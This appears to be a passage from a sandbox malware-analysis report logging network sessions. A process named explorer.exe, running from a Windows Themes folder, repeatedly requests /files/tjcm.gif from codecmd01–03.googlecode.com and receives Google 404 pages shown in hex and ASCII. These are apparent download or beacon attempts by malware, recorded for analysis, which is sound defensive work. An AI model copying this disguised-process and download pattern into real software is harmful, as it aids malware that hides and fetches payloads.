25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:31.361196041 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              102192.168.2.651254173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:32.152590036 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:32.823136091 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:32 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:32.823214054 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              103192.168.2.651255142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:33.449762106 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:34.138250113 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:34 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:34.138421059 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              104192.168.2.65125664.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:34.942445993 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:35.647583961 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:35 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:35.647701979 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              105192.168.2.651257173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:36.065834045 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:36.750900030 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:36 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:36.750956059 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              106192.168.2.651258142.251.173.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:37.522813082 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd02.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:38.236360073 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:38 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:38.236408949 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              107192.168.2.65125964.233.184.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:38.606882095 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd03.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:39.273787975 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:39 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                              Sep 30, 2024 16:10:39.274059057 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                              Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              108192.168.2.651260173.194.76.82806120C:\Windows\Resources\Themes\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 30, 2024 16:10:40.128727913 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: codecmd01.googlecode.com
                                              Connection: Keep-Alive
                                              Sep 30, 2024 16:10:40.845073938 CEST1236INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=UTF-8
                                              Referrer-Policy: no-referrer
                                              Content-Length: 1575
                                              Date: Mon, 30 Sep 2024 14:10:40 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
